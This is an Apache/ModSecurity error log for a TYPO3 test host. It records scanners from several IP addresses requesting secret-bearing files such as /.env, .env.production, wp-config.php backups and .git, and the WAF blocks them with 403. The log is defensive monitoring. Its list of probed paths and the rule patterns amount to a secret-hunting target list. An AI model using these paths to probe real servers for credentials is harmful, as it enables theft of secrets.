[Wed Aug 06 09:30:53.672030 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/platform/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI8AAAAAM"]
[Wed Aug 06 09:30:53.733023 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.txt/html/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI8gAAAAM"]
[Wed Aug 06 09:30:53.733237 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.txt/html/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI8gAAAAM"]
[Wed Aug 06 09:30:53.733413 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.txt/html/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI8gAAAAM"]
[Wed Aug 06 09:30:53.755557 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJMErVJbmk9kSAGhb9lI8wAAAAM"]
[Wed Aug 06 09:30:53.755759 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJMErVJbmk9kSAGhb9lI8wAAAAM"]
[Wed Aug 06 09:30:53.755910 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJMErVJbmk9kSAGhb9lI8wAAAAM"]
[Wed Aug 06 09:30:53.778050 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI9AAAAAM"]
[Wed Aug 06 09:30:53.778272 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI9AAAAAM"]
[Wed Aug 06 09:30:53.778447 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI9AAAAAM"]
[Wed Aug 06 09:30:54.159807 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "aJMErlJbmk9kSAGhb9lI-QAAAAM"]
[Wed Aug 06 09:30:54.160049 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "aJMErlJbmk9kSAGhb9lI-QAAAAM"]
[Wed Aug 06 09:30:54.160249 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "aJMErlJbmk9kSAGhb9lI-QAAAAM"]
[Wed Aug 06 09:30:54.182652 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.orig"] [unique_id "aJMErlJbmk9kSAGhb9lI-gAAAAM"]
[Wed Aug 06 09:30:54.182883 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.orig"] [unique_id "aJMErlJbmk9kSAGhb9lI-gAAAAM"]
[Wed Aug 06 09:30:54.183052 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.orig"] [unique_id "aJMErlJbmk9kSAGhb9lI-gAAAAM"]
[Wed Aug 06 09:30:54.205018 2025] [authz_core:error] [pid 1739925] [client 185.177.72.236:35632] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.ini
[Wed Aug 06 09:30:54.342180 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/html/.env"] [unique_id "aJMErlJbmk9kSAGhb9lI_wAAAAM"]
[Wed Aug 06 09:30:54.342441 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/html/.env"] [unique_id "aJMErlJbmk9kSAGhb9lI_wAAAAM"]
[Wed Aug 06 09:30:54.342624 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/html/.env"] [unique_id "aJMErlJbmk9kSAGhb9lI_wAAAAM"]
[Wed Aug 06 09:30:54.404380 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "aJMErlJbmk9kSAGhb9lJAQAAAAM"]
[Wed Aug 06 09:30:54.404541 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "aJMErlJbmk9kSAGhb9lJAQAAAAM"]
[Wed Aug 06 09:30:54.404766 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "aJMErlJbmk9kSAGhb9lJAQAAAAM"]
[Wed Aug 06 09:30:54.404945 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "aJMErlJbmk9kSAGhb9lJAQAAAAM"]
[Wed Aug 06 09:30:54.427185 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aJMErlJbmk9kSAGhb9lJAgAAAAM"]
[Wed Aug 06 09:30:54.427414 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aJMErlJbmk9kSAGhb9lJAgAAAAM"]
[Wed Aug 06 09:30:54.427598 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aJMErlJbmk9kSAGhb9lJAgAAAAM"]
[Wed Aug 06 09:30:54.449273 2025] [authz_core:error] [pid 1739925] [client 185.177.72.236:35632] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configs
[Wed Aug 06 10:32:26.810919 2025] [:error] [pid 1739941] [client 20.74.83.27:18612] [client 20.74.83.27] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJMTGgfN7XRSOYx3P0MdnQAAAAU"]
[Wed Aug 06 10:32:26.811245 2025] [:error] [pid 1739941] [client 20.74.83.27:18612] [client 20.74.83.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJMTGgfN7XRSOYx3P0MdnQAAAAU"]
[Wed Aug 06 10:32:26.811453 2025] [:error] [pid 1739941] [client 20.74.83.27:18612] [client 20.74.83.27] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJMTGgfN7XRSOYx3P0MdnQAAAAU"]
[Wed Aug 06 12:53:29.659006 2025] [authz_core:error] [pid 1739922] [client 198.55.98.68:35208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Aug 06 12:54:20.255876 2025] [authz_core:error] [pid 1741746] [client 198.55.98.68:58496] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Aug 07 18:07:27.374081 2025] [authz_core:error] [pid 1767180] [client 93.123.109.79:60766] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Aug 08 18:50:50.899283 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJYq6pzngu819Zze44FPUQAAAAA"]
[Fri Aug 08 18:50:50.900249 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJYq6pzngu819Zze44FPUQAAAAA"]
[Fri Aug 08 18:50:50.900440 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJYq6pzngu819Zze44FPUQAAAAA"]
[Fri Aug 08 18:50:50.922406 2025] [authz_core:error] [pid 1791146] [client 185.177.72.202:13044] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Fri Aug 08 18:50:50.945247 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJYq6pzngu819Zze44FPUwAAAAA"]
[Fri Aug 08 18:50:50.945514 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJYq6pzngu819Zze44FPUwAAAAA"]
[Fri Aug 08 18:50:50.945709 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJYq6pzngu819Zze44FPUwAAAAA"]
[Fri Aug 08 18:50:50.968203 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJYq6pzngu819Zze44FPVAAAAAA"]
[Fri Aug 08 18:50:50.968493 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJYq6pzngu819Zze44FPVAAAAAA"]
[Fri Aug 08 18:50:50.968695 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJYq6pzngu819Zze44FPVAAAAAA"]
